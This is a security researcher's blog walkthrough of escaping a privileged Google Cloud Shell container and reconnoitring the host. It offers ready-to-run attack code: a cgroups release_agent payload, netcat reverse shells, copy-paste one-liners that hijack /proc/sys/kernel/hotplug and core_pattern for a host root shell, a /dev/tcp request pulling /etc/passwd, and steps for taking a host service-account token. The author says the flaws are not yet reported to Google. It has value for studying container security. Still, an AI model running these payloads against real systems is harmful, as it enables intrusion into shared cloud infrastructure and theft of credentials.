Google Cloud Shell Container Escape
Cloud Shell Postmortem: In-Depth Analysis of Internal Mechanisms
On a fine late-monsoon weekend morning in India, I was sitting by my window with my laptop in hand, contemplating nature and life at a “multi-threading” level. The next thing I thought of was hack something (ethically, of course), it’s the second most exciting thing for me! (You can guess the first one. 😄)
Motivated to perform a security analysis, I began recon on one of the hottest companies right now: OpenAI. Anyone who’s worked on it knows they run a massive IT infrastructure with many subdomains for research and model training. While scanning from my laptop, tools like httpxkept dropping connections or terminating scans midway because of my machine’s limited compute/bandwidth. A VPS would have helped, but cost was a blocker.
I started using Google Cloud Shell — a free Linux shell environment from Google Cloud that offers a persistent 5 GB of storage and a stable, high-speed connection. It’s great, but like any free service it has limitations: the default weekly Cloud Shell quota is 50 hours, and once that’s reached you must wait for the quota to reset ¯\_(ツ)_/¯
My initial goal had been to bypass Cloud Shell’s restrictions, but while analysing the environment I realised how complex and extensive Cloud Shell’s configuration and codebase are. It also came to my attention that Google Cloud runs a Vulnerability Rewards Programme (launched roughly a year ago).
So I switched my focus from OpenAI to Google Cloud Shell.
Whenever I come across such a terminal my ultimate goal is to get a root shell, but here I saw that I already have root access!
Behind Virtual Bars
While running an automated enumeration script (LinEnum) on Google Cloud Shell, a few outputs immediately caught my attention and made me suspicious about the underlying environment.
The /proc/version file showed something unusual. The kernel being compiled under Chromium OS. However, /etc/os-release still reported the OS as Ubuntu 24.04.3 LTS
This mismatch between the Chromium OS kernel and the Ubuntu userspace immediately raised suspicion, a strong sign of a containerized environment where the container runs a userland of one OS (Ubuntu) on top of a host kernel from another (ChromeOS).
To confirm my assumption, I ran:
Next, I validated it by inspecting cgroup configurations:
Both pointed to paths under /k8s.io/..., revealing that the container was being orchestrated through Kubernetes.
Finally, I checked the init process:
It showed that PID 1 was bash instead of systemd, another indicator of a minimal container environment.
All together confirmed that Google Cloud Shell runs inside a Docker container orchestrated by Kubernetes, rather than a standalone computer/virtual machine.
Escaping the Invisible Cage
As soon as I realized I was trapped inside Docker, my first milestone was simple: escape the container
Time to test the walls.
While analyzing further, one of the key questions that came to mind was — am I running inside a privileged Docker container? A privileged container runs with almost unrestricted access to the host, including kernel-level operations, device access, and unrestricted mounts.
Privilege Assessment
I began by checking the available capabilities (the set of permissions assigned by the Linux kernel to processes) to detect whether I was inside a privileged container.
The value 000001ffffffffff is a hexadecimal bitmask representing all currently active capabilities. To make sense of it, I decoded it using the capsh utility.
The decoded list clearly shows high-impact capabilities such as:
cap_sys_admin- allows mounting filesystems and performing administrative operations.cap_sys_module- permits loading and unloading kernel modules.cap_net_admin- grants network configuration privileges.
The presence of these high-privilege capabilities confirms that the container was launched with the --privileged flag.
My path was clear: take advantage of any of these capabilities to attempt host escape or privilege escalation.
Attack Attempts — Chronology
Attempt #1 — Kernel module (CAP_SYS_MODULE)
First, cap_sys_module caught my attention. I searched for "cap_sys_module escaping container" and found a write-up titled Escaping the Container: Weaponizing Kernel Module Loading via CAP_SYS_MODULE by IBM PTC Security.
I quickly tried the method explained in that blog. First I confirmed that kernel module loading was enabled by checking /proc/sys/kernel/modules_disabled (it was 0). Next, I created a malicious kernel module (hello.c) and a corresponding Makefile inside the container and compiled them to generate a .ko file. I then attempted to load the module onto the host kernel using insmod.
The module loading failed because the host kernel has Kernel Module Signature Verification (KMSV) enforced, meaning, it will only load modules that are digitally signed with a cryptographic key the host system trusts. Since my compiled module was unsigned, it was immediately rejected. :(
I learnt this the hard way. If you ever encounter such a situation, do not waste time building unsigned modules, instead inspect the kernel command line for the module.sig_enforce parameter. It is the primary way to check whether module signature enforcement is explicitly set:
- If output includes
module.sig_enforce=1- KMSV is explicitly enabled/enforced. - If no output, or output includes
module.sig_enforce=0- enforcement is disabled by parameter.
Attempt #2 — cgroups v1 release_agent (notify_on_release)
I explored other ways to escape a privileged container and came across this post on X/Twitter.
The payload looks wild, right? Let’s understand the logic behind it.
The core technique abuses a legacy cgroups v1 feature called notify_on_release. By enabling this feature in a cgroup hierarchy and setting a release_agent (which points to an attacker-controlled script on the host under the container's filesystem path), an attacker can cause that script to execute as privileged root on the host when the last process in that cgroup exits.
Still confused? Here is a refined, un-obfuscated shell-script version of the same payload with explanations:
# 1. Mount the cgroup filesystem and create a child cgroup 'x'
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# 2. Enable notification on release for the new cgroup
echo 1 > /tmp/cgrp/x/notify_on_release
# 3. Find the container's path on the host, and set it as the release_agent script
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# 4. Create the malicious script (/cmd) in the container's shared filesystem.
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd # The command to run on the host
chmod a+x /cmd
# 5. Execute a process in the cgroup 'x' that immediately exits, triggering the payload
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"When I tried to run this payload in the cloud shell, it failed at the very first step:
The error was self-explanatory. The cgroup hierarchy is already mounted globally at /sys/fs/cgroup, so we cannot mount it again. You can confirm this using the mount command:
From the output you can see it is using cgroup2 — the unified hierarchy.
According to the Linux manual page for cgroups, the release_agent and notify_on_release files are part of cgroups v1 and were removed in cgroups v2. I quickly checked:
Those files are essential to the exploit, which means this payload is valid only on cgroups v1 systems and will not work on Google cloud shell that use the cgroup v2 unified hierarchy.
This door no longer exists.
Attempt #3 — Successful escape!
The next morning I woke up with renewed hope. The first two attempts had failed, but they taught me a lot which is the pleasant part of failing, if you ask me.
The fundamental lesson I learned was that containers share the host kernel (unlike VMs that ship a guest kernel on top of a hypervisor). That means any vulnerability in the host kernel can affect every container: a kernel exploit can become a container escape, crossing namespace and capability boundaries to reach the host.
To break out of a Docker container and get code executed on the host you generally need two core elements:
- The payload — a binary or script (for example, a reverse shell) placed inside the container’s filesystem and ready to be executed by the host. You must know the absolute path to that file as seen from the host.
- The flaw (vector) — a kernel vulnerability, misconfiguration or legitimate kernel feature that can be abused so a process inside the container causes the host kernel (or a privileged host process) to execute that payload.
Below I describe two practical methods that I have tried and found successful.
Method #1 — hotplug hijacking
Payload
I created a small reverse-shell script inside the container:
#!/bin/sh
nc -e /bin/bash <CONTAINER_IP> <PORT>To connect back, you can use nc (netcat) or any alternative reverse-shell mechanism available on the host.
Tip: To find the container IP use
ip a show dev eth0orhostname -I. Ifhostname -Iprints multiple addresses, the first is usually the container's primary IP.
Saved it as /shell and made it executable (chmod +x /shell).
I started a nc listener in a separate container terminal on the same port so I could receive the incoming connection:
sudo apt install netcat-traditional # if not already installed
nc -lvnp <PORT>The payload is created inside the container, we still need the host absolute path to that file for the host to execute it. The host kernel or a host process does not see the container’s simple path (for example /shell); it sees the file at the location where the container's root filesystem is mounted on the host.
Container runtimes (Docker, containerd, etc.) use OverlayFS to implement the layered filesystem, meaning, the container's writable layer (where /shell lives) is actually a directory on the host that is presented to the container as /. Use the mount output to locate the container's writable layer (upperdir)
Concatenate the host upperdir with the in-container path to get the host-visible absolute path to the payload. Final Host Path to the payload: /var/lib/containerd/io.containerd.snapshotter.v1.gcfs/snapshotter/snapshots/236/fs/shell
The vector
Linux’s hotplug subsystem executes a helper program specified in /proc/sys/kernel/hotplug whenever a hotplug event occurs (for example, when a new network device appears). By writing the host-visible absolute path of our payload into /proc/sys/kernel/hotplug, the kernel will call that path and run that payload on the next hotplug event.
Write the host path to hotplug:
Triggering a hotplug event:
One simple way to trigger a hotplug event is to create a test network device:
ip link add test0 type dummy || ip link add test0 type tun # depending on available drivers
ip link delete test0It causes the kernel to invoke its hotplug helper which was hijacked to point to our payload, the kernel will execute it on the host.
Wow!! It worked.
Get Bipin Jitiya’s stories in your inbox
Join Medium for free to get updates from this writer.
The host replied. Boundary crossed.
To confirm the escape I re-ran the same checks I used at the start of this post. The outputs clearly show I am now executing on the host:
systemd-detect-virtreturninggoogleindicates the environment is a Google Machine (host-side), not a container runtime.cat /proc/self/cgroupshowing0::/means the current process is in the root cgroup (no container-specific cgroup entries)ps -p 1showingsystemdas PID 1 confirms the system is running the host init (systemd).
I used the commands
python3 -c 'import pty, os; pty.spawn("/bin/bash")'andexport TERM=xterm-256colorto convert the netcat shell into an interactive terminal. This allows features like proper display of colours and formatting in the terminal, thereby improving the overall shell experience.
One-liner payload
Open a terminal window and start a listener using nc -lvnp 9001. Then, in a new terminal window, run the following one-liner payload to receive a root shell connection from the host and escape the container.
echo $'#!/bin/sh\nnc -c /bin/bash '$(hostname -I|awk '{print $1}')' 9001' | sudo tee /shell > /dev/null && sudo chmod +x /shell; echo "$(mount|grep upper|sed -E 's/.*upperdir=([^,]+).*/\1/')/shell" | sudo tee /proc/sys/kernel/hotplug > /dev/null; sudo ip link add test0 type dummy && sudo ip link delete test0Method #2 — core_pattern hijacking
Idea / vector
/proc/sys/kernel/core_pattern controls what the kernel does when a process crashes and produces a core dump. If the value begins with a pipe character (|), the kernel executes the remainder as a program and streams the raw core bytes to that program's stdin. Crucially, the kernel performs this execve() from the host context (not inside the container), so the handler runs with host-level privileges. That behavior makes core_pattern a powerful vector when a container can write the pattern or point it to an executable the host can run.
Payload
Instead of a file path (of our reverse shell), core_pattern accepts a pipe-handler: a program invocation prefixed with |. The kernel requires the program to be specified by an absolute pathname (for example /usr/bin/nc). In my case I wrote a handler that invoked nc to connect back to my listener:
echo '|/usr/bin/nc -e /bin/sh <CONTAINER_IP> <PORT>' | sudo tee /proc/sys/kernel/core_pattern >/dev/nullPlease note: As in Method #1 I placed the
/shellscript inside the container; in this (Method #2) you can also reference the same script/payload by its host-side absolute path (the container'supperdir).
Triggering the crash:
I started a simple process I controlled and crashed it (By forcing it to generate a crash dump with the -SEGV or -SIGABRT flag) so the kernel would invoke the handler:
sleep 9999 &
echo $! > /tmp/sleep.pid
kill -SIGABRT $(cat /tmp/sleep.pid)Alternatively you can compile and run a tiny C program that dereferences NULL (segfaults).
gcc -x c -o /tmp/a - <<< 'int main(){volatile int *p=0;*p=1;}' && /tmp/aWhen the process crashed, the kernel saw the piped core_pattern, fork()/execve()d the handler on the host, and streamed the core to the handler's stdin. Because my handler was a reverse-shell invocation, the host connected back to my listener and I received a root shell from the node.
One-liner payload
Open a terminal window and start a listener using nc -lvnp 9001. Then, in a new terminal window, run the following one-liner payload to receive a root shell connection from the host and escape the container.
echo "|/usr/bin/nc -e /bin/bash $(hostname -I|awk '{print $1}') 9001" | sudo tee /proc/sys/kernel/core_pattern > /dev/null; (sleep 60 & kill -SIGABRT $!)Fingerprinting the Host
Host was running Container-Optimized OS 117 (Lakitu), a minimal Linux distribution maintained by Google, purpose-built for running Docker and containerd workloads within Google Cloud environments.
On the host system, I observed several containers under the k8s.io namespace:
Containers such as metadata-proxy, command-recorder, gateway, client-communication-service, and orchestrator appeared to be GCP Cloud Shell service pods, orchestrated through Kubernetes.
I was able to further review these containers by running commands inside them.
Also, the directory /var/log/containers/ on the host contained .log files following the standard Kubernetes logging convention (<pod_name>.log).
Next, I inspected temporary files and found two interesting ones inside /tmp:
/tmp/key1524398165- contained a private key/tmp/cert1424204183- a certificate issued by Google DevOps
Although I could not determine their exact purpose, they were likely used by Cloud Shell’s backend proxy or gRPC service layer for secure inter-service communication. I decided to revisit this later for deeper investigation.
Another important aspect of Google Cloud Shell is the “Open in Cloud Shell” feature. This feature allows a user to interact with the Cloud Shell environment directly by passing user-supplied values to a set of predefined URL parameters, as documented in the official Google Cloud documentation.
Internally, this functionality is implemented through a shell function named cloudshell_open within the Cloud Shell environment. This is not a standalone binary, but a Linux shell function that ultimately invokes the executable /google/devshell/bin/cloudshell_open_go, passing all user-supplied parameters as command-line arguments.
cloudshell_open_go binary was compiled ELF executable, it was difficult static review nd analysis.
Interestingly, on the host system, I was able to locate uncompiled Go source code corresponding to this binary. The source files were found within containerd snapshot directories.
This script act as a local client that communicates with the Google Cloud Shell front-end service using a TCP socket (on localhost:8998). Its primary role is to send structured control messages (length-prefixed, PBLite-formatted JSON messages) to the Cloud Shell UI to trigger actions such as opening files, downloading files, or opening a workspace.
To demonstrate what happens under the hood, I created the following one-liner bash payload, which directly interacts with the same internal socket endpoint, bypassing the wrapper script entirely:
req='[null,null,null,[null,[["/etc/passwd"]]]]'; \
printf "%s\n%s" ${#req} "$req" > /dev/tcp/127.0.0.1/8998Upon execution, the Cloud Shell frontend interprets the message and immediately triggers a download prompt for the /etc/passwd file, as shown below:
Further investigation led me to identify a path traversal vulnerability via symlink bypass, which I documented as a separate report.
My next step was to query the GCE Metadata API. I sent a request to the endpoint: http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/
This API is used to retrieve details about the service account linked to the current instance. From within the Docker container, it returned my user email address, whereas from the host, it returned a service account likely associated with the underlying Google Compute Engine (GCE) instance.
I quickly generated an access token for this service account:
I stored the token in $ACCESSTOKEN, and I validated it through Google APIs to review its associated permissions.
Among the permissions, the one that caught my attention was devstorage.read_only.
To explore this further, I needed the current project ID, which could be derived from the subdomain of the service account’s email address. Alternatively, it can also be obtained from the metadata API:
Using the project ID and the access token, I attempted to list the storage buckets. Unfortunately, the request returned a 403 Forbidden error.
At this point, I realized I would need to go through the GCE documentation thoroughly to debug the behavior. I decided to postpone that for later and continued my reconnaissance on the host.
I wanted to determine whether the host was running on bare metal or inside a virtual machine. I queried the system’s DMI information:
root@cloudshell-014XXXXa-3f10-4f87-a664-014XXXXXX5ac / # dmidecode -s system-product-name
Google Compute Engine
root@cloudshell-014XXXXa-3f10-4f87-a664-014XXXXXX5ac / #The output immediately revealed “Google Compute Engine”, a clear indication that the host was running as a GCE virtual machine, not on bare metal.
Next, I inspected kernel logs for signs of virtualization components:
dmesg | grep -iE 'hypervisor|kvm|qemu|vmware|xen'The logs confirmed it beyond doubt:
The kernel had indeed booted under a KVM hypervisor, which is the standard virtualization layer used by Google Cloud for its compute instances.
To further validate this, I listed all attached PCI devices:
lspci | grep -i 'virtual\|virtio\|vmware\|qemu\|xen'The output displayed several Virtio devices (network, SCSI, RNG, balloon), confirming a paravirtualised setup, typical for KVM/QEMU-based VMs.
Additionally, /proc/cpuinfo included the hypervisor flag, another definitive indicator that the kernel was running inside a virtualised environment:
grep -E 'vmx|svm|hypervisor' /proc/cpuinfoCollectively, these indicators confirmed that the current session was operating within a Google Compute Engine virtual machine, powered by a KVM-based hypervisor and using Virtio paravirtual devices.
At this stage, it became clear why I couldn’t access any customer-sensitive data or other user’s information. I had successfully uncovered one layer of the Cloud Shell infrastructure, yet remained isolated within the KVM boundary.
Escaped, but not free.
Breaking that isolation would indeed be a major milestone, but it would require much deeper exploration of the environment, extensive study of KVM/Linux internals, and a solid understanding of Google Cloud’s backend architecture.
Considering the verbosity of this post, I decided to conclude here. I hope this walkthrough helped you learn something about the underlying layers of Google Cloud Shell and how to methodically analyze such environment.
I have not reported these findings to Google yet (At the time of writing this post), as they don’t appear to pose major security impact. I prefer to keep the environment intact for further research. Wish me luck — if I discover something more substantial, I’ll share it in the next part of this series! 🥂
Who am I?
I’m Bipin Jitiya, founder of Cuberk Solutions. I expose systems to controlled attacks, like a vaccine, so they can build immunity against hackers and malwares
At Cuberk, we are an information security company focused on helping critical businesses truly understand and secure their IT environments, not just tick compliance checkboxes. We specialize in hands-on vulnerability assessment and penetration testing, with a strong focus on real-world attack scenarios and practical remediation.
If you are curious to know more about what we do, feel free to visit us at www.cuberk.com